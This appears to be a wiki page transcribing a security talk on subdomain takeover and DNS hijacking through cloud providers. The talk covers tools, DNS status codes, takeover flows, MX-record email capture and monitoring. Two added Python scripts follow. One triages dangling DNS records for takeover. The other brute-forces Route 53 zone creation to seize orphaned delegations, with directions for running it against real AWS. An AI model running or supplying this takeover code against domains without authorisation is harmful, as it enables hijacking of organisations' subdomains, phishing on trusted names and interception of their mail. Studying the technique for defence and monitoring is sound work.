= DNS/hijacking/detectify =
[[/Guide]]

https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/
[[/herokugithubdesk]] Hostile Subdomain Takeover using Heroku/Github/Desk + more, October 21, 2014
----
https://www.slideshare.net/fransrosen/dns-hijacking-using-cloud-providers-no-verification-needed-76812183
== slide ==
DNS hijacking using cloud providers – No verification needed
1. DNS hijacking using cloud providers - no verification needed
2. Frans Rosen, Security Advisor @detectify (twitter: @fransrosen). HackerOne #5 @ hackerone.com/leaderboard/all-time. Blog at labs.detectify.com. Talked here last year! "The Secret life of a Bug Bounty Hunter"
3. Rundown
 * Background
 * History
 * Tools & Techniques
 * Deeper levels of hijacking
 * Evolution
 * Mitigations
 * Monitoring
4. Subdomain Takeover v1.0: campaign.site.com -> Campaign!
5. Subdomain Takeover v1.0: campaign.site.com -> Campaign! Fake site!
6. Ever seen one of these?
7. First instance, 12th Oct '14: http://esevece.tumblr.com/post/99786512849/onavo-cname-records-pointing-to-heroku-but-no
8. 9 days later, 21st Oct '14: https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/
9. Response from services. Heroku: "We're aware of this issue". GitHub: "My apologies for the delayed response. We are aware of this issue". Shopify: "I had already identified that this is a security issue".
10. What have we seen?
11. What have we seen? https://hackerone.com/reports/172137
12. What have we seen?
13. What have we seen? https://hackerone.com/reports/32825
14. What have we seen?
15. What have we seen? https://crt.sh/?q=%25.uber.com
16. What have we seen? https://blog.rubidus.com/2017/02/03/deep-thoughts-on-subdomain-takeovers/
17. What have we seen? https://labs.detectify.com/2016/10/05/the-story-of-ev-ssl-aws-and-trailing-dot-domains/
18. What have we seen?
19. What have we seen?
20. What have we seen?
21. Tools
22. subbrute: not in active development. https://github.com/TheRook/subbrute
23. Sublist3r: https://github.com/aboul3la/Sublist3r Active dev! Took over subbrute! Fetching from multiple sources
24. massdns: https://github.com/blechschmidt/massdns Fast as hell! Needs lists to resolve
25. altdns: https://github.com/infosec-au/altdns Soo soo powerful if you have good mutations. Combine with massdns == success. Can resolve, but better for just creating the lists
26. tko-subs: https://github.com/anshumanbh/tko-subs Interesting idea, auto takeover when finding issues. Might be a liiittle bit too aggressive
27. We could look here?
28. WRONG! WRONG! WRONG! WRONG! WRONG! WRONG! WRONG! WRONG!
29. WRONG! Resolve and not resolve is what matters.
30. Dead DNS records
31. A dead record?
32. A dead record?
33. dig is your friend
34. 9 year old bug
35. SERVFAIL/REFUSED: https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/index.html
36. Also works on subdomain delegations!
37. DNS status codes: NOERROR. Resolves. All OK.
38. DNS status codes: NXDOMAIN. Doesn't exist. Could still have a DNS RR. Query NS to find out more.
39. DNS status codes: REFUSED. NS does not like this domain.
40. DNS status codes: SERVFAIL. Not even responding. Very interesting!
41. The tools find what? SERVFAIL, REFUSED, NOERROR, NXDOMAIN ????
42. Subdomain delegation
43. Subdomain delegation
44. Subdomain delegation
45. Brute add/delete R53 DNS
46. We now control the domain!
47. Orphaned EC2 IPs: https://www.bishopfox.com/blog/2015/10/fishing-the-aws-ip-pool-for-dangling-domains/
48. Orphaned EC2 IPs
49. dev.on.site.com http://integrouschoice.com/
50. dev.on.site.com
51. dev.on.site.com
52. Flow: Brute
 * Collect NOERROR
 * Collect SERVFAIL / REFUSED, +trace the NS
 * Collect NXDOMAIN if CNAME, +trace
53. Flow: Resolve
 * Check NOERROR for patterns
 * SERVFAIL/REFUSED: check NS for patterns
 * NXDOMAIN: traverse up to apex, check: NXDOMAIN | SERVFAIL | REFUSED | no servers could be reached
54. Flow: Improve
 * Collect all subdomain names
 * Sort them by popularity
 * Sort www below all names with p>2
55. Flow: Analyze unknowns
 * Collect titles of all sites (or EyeWitness!)
 * Filter out common titles + name of company
 * Generate screenshots, create an image map: https://github.com/ChrisTruncer/EyeWitness
56. Flow: Repeat
 * Do it every day
 * Push notification changes
57. Jan 2017
58. Jan 2017
59. Jan 2017
60. Jan 2017
61. Jan 2017
62. Jan 2017
63. Jan 2017
64. Monitoring is really preventing this. Psst, this is exactly what we do! Shameless plug
65. The competition: @avlidienbrunn @arneswinnen @TheBoredEng
66. My takeovers since 2014-10
67. detectify
68. Email snooping!
69. September 2016: http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty
70. 2 of the 3 in action
71. MX-records. Inbound mail. This is important.
72. MX-records
73. Conflict check + Validation
74. Oh, add this!
75. CNAME -> MX
76. Whitelisted aliases for verification
77. Back to this
78. Tadaa!
79. We now get postmaster!
80. Response the day after
81. Response the day after
82. Response the day after
83. On a final note: https://twitter.com/realdonaldtrump/status/190093504939163648
84. On a final note: https://twitter.com/realdonaldtrump/status/190093504939163648
85. On a final note
86. On a final note
87. On a final note
88. Recap
 * Know your DNS Zone file: MX, CNAME, A, AAAA, ALIAS. Everything.
 * AUTOMATION, probably the only proper solution
 * will.i.am loves this
89. Go hack yourself! Questions? Frans Rosen (@fransrosen) - www.detectify.com
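The "DNS status codes" slides and the "Flow: Resolve" step above describe how to sort brute-forced names by resolver outcome rather than by "is it in a provider list". The following is an added example (not the speaker's or Detectify's tooling) that implements that triage: it follows CNAME chains, walks an NXDOMAIN target up towards its apex to tell "unregistered domain" from "unclaimed resource at a provider", and pulls the delegation's NS records for SERVFAIL/REFUSED names. The DNS lookup function is injected so the logic runs offline against a constructed fake zone; all names under `.example` are hypothetical, and `herokuapp.example` stands in for a cloud provider's domain. The two-label apex rule is a simplification (no public-suffix list).

```python
"""Resolver-outcome triage for subdomain-takeover hunting.

Added example, not code from the talk. The lookup function is injected so
the logic runs offline against a constructed fake; in real use wrap dnspython
or `dig` and feed it the names massdns/altdns produced.
"""
from typing import Callable, Dict, List, Tuple

NOERROR, NXDOMAIN, SERVFAIL, REFUSED = "NOERROR", "NXDOMAIN", "SERVFAIL", "REFUSED"
Lookup = Callable[[str, str], Tuple[str, List[str]]]  # (name, rrtype) -> (rcode, rdata)

# Constructed sample data (hypothetical names). Anything not listed -> NXDOMAIN.
FAKE_DNS: Dict[str, Tuple[str, Dict[str, List[str]]]] = {
    "site.example":          (NOERROR, {"NS": ["ns1.site.example"]}),
    "www.site.example":      (NOERROR, {"A": ["203.0.113.10"]}),
    # CNAME to a provider hostname nobody has claimed (provider apex exists).
    "campaign.site.example": (NOERROR, {"CNAME": ["site-campaign.herokuapp.example"]}),
    "herokuapp.example":     (NOERROR, {"NS": ["ns1.herokuapp.example"]}),
    # CNAME into a domain that has expired entirely (apex NXDOMAINs too).
    "old.site.example":      (NOERROR, {"CNAME": ["cdn.expired-corp.example"]}),
    # Delegated child zones whose nameservers no longer serve them. The NS
    # rdata models what the parent zone still advertises for the delegation.
    "dev.site.example":      (SERVFAIL, {"NS": ["ns-1234.awsdns-00.example"]}),
    "legacy.site.example":   (REFUSED,  {"NS": ["ns1.oldhoster.example"]}),
}


def fake_lookup(name: str, rrtype: str) -> Tuple[str, List[str]]:
    """Stand-in for a real resolver query against the constructed data."""
    rcode, rrsets = FAKE_DNS.get(name, (NXDOMAIN, {}))
    return rcode, list(rrsets.get(rrtype, []))


def highest_nxdomain(name: str, lookup: Lookup) -> str:
    """Walk a non-existent name up label by label and return the ancestor
    closest to the root that still answers NXDOMAIN. Stops at two labels,
    treated as the registrable apex (assumption: no public-suffix list)."""
    labels = name.split(".")
    highest = name
    while len(labels) > 2:
        labels = labels[1:]
        parent = ".".join(labels)
        rcode, _ = lookup(parent, "NS")  # the rcode does not depend on rrtype
        if rcode != NXDOMAIN:
            break
        highest = parent
    return highest


def classify(name: str, lookup: Lookup, max_depth: int = 8) -> Dict[str, object]:
    """Return a triage record for one subdomain, following CNAMEs as it goes."""
    chain: List[str] = []
    current = name
    for _ in range(max_depth):
        rcode, cnames = lookup(current, "CNAME")
        if rcode in (SERVFAIL, REFUSED):
            _, ns = lookup(current, "NS")
            return {"name": name, "status": rcode, "chain": chain, "ns": ns,
                    "action": "check whether the NS provider lets you create this zone"}
        if rcode == NXDOMAIN:
            apex = highest_nxdomain(current, lookup)
            registrable = apex.count(".") == 1  # whole 2-label domain is gone
            return {"name": name, "status": NXDOMAIN, "chain": chain,
                    "highest_nxdomain": apex,
                    "action": "register the domain" if registrable
                    else "claim the unclaimed resource at the provider"}
        if not cnames:
            return {"name": name, "status": NOERROR, "chain": chain,
                    "action": "resolves; fingerprint titles/screenshots"}
        chain.append(cnames[0])
        current = cnames[0]
    return {"name": name, "status": "LOOP", "chain": chain,
            "action": "CNAME chain longer than max_depth"}


if __name__ == "__main__":
    for n in ["www.site.example", "campaign.site.example", "old.site.example",
              "dev.site.example", "legacy.site.example"]:
        print(classify(n, fake_lookup))
```

Note that a real resolver answers a dangling CNAME with NXDOMAIN and the CNAME in the answer section; querying the alias and the target separately, as above, makes the same distinction explicit. The SERVFAIL/REFUSED branch only collects the NS names: whether that provider hands out zones without verification (the "Brute add/delete R53 DNS" slides) is the next step.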
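The "Subdomain delegation" and "Brute add/delete R53 DNS" slides (and the linked orphaned-internet write-up) rely on the fact that Route 53 assigns a random delegation set to each new hosted zone, so an orphaned NS record can be matched by creating zones until the assigned set overlaps and deleting the misses. The code below is an added example, not the speaker's tooling: the AWS client is injected, and the `FakeRoute53` class is a constructed stand-in that mimics the response shape of boto3's `create_hosted_zone`/`delete_hosted_zone` with a small nameserver pool so the loop ends quickly. Nameserver names under `.example` are hypothetical.

```python
"""Brute-force hosted-zone creation until the delegation set overlaps a
dangling NS record. Added example; the client is injected so it runs offline.
"""
import random
import uuid
from typing import Iterable, Optional, Set


class FakeRoute53:
    """Constructed stand-in for boto3.client('route53'). Real AWS draws from a
    much larger pool, which is why the slides say 'brute'."""
    POOL = [f"ns-{i}.awsdns-{i % 4:02d}.example" for i in range(1, 13)]

    def __init__(self, seed: int = 1) -> None:
        self.rng = random.Random(seed)
        self.live: Set[str] = set()   # zone ids currently existing
        self.calls = 0

    def create_hosted_zone(self, Name: str, CallerReference: str) -> dict:
        self.calls += 1
        zone_id = f"/hostedzone/Z{self.calls:06d}"
        self.live.add(zone_id)
        return {"HostedZone": {"Id": zone_id, "Name": Name},
                "DelegationSet": {"NameServers": self.rng.sample(self.POOL, 4)}}

    def delete_hosted_zone(self, Id: str) -> dict:
        self.live.remove(Id)
        return {"ChangeInfo": {"Id": Id, "Status": "PENDING"}}


def claim_dangling_delegation(client, zone_name: str, dangling_ns: Iterable[str],
                              max_attempts: int = 200,
                              require_all: bool = False) -> Optional[dict]:
    """Create zones until one's delegation set overlaps the nameservers the
    orphaned NS record points at; delete every miss so no junk zones remain.

    One overlapping nameserver already gets you a share of the queries; pass
    require_all=True to insist on the full set (far more attempts on real AWS).
    Returns the kept zone id, the matched nameservers and the attempt count,
    or None if max_attempts is exhausted.
    """
    wanted = {ns.rstrip(".").lower() for ns in dangling_ns}
    for attempt in range(1, max_attempts + 1):
        resp = client.create_hosted_zone(Name=zone_name,
                                         CallerReference=str(uuid.uuid4()))
        zone_id = resp["HostedZone"]["Id"]
        got = {ns.rstrip(".").lower() for ns in resp["DelegationSet"]["NameServers"]}
        hit = wanted & got
        if hit == wanted or (hit and not require_all):
            return {"zone_id": zone_id, "matched": sorted(hit), "attempts": attempt}
        client.delete_hosted_zone(Id=zone_id)   # miss: clean up before retrying
    return None


if __name__ == "__main__":
    # Pretend `dig NS dev.site.example` showed a delegation that SERVFAILs.
    orphaned = ["ns-3.awsdns-03.example", "ns-9.awsdns-01.example"]
    print(claim_dangling_delegation(FakeRoute53(seed=7), "dev.site.example.", orphaned))
```

Swap `FakeRoute53` for `boto3.client("route53")` to run it for real; the `CallerReference` must be unique per call, which is why a fresh UUID is generated each time. Keep `max_attempts` modest and make sure the delete runs on every miss, or the account fills up with unused zones.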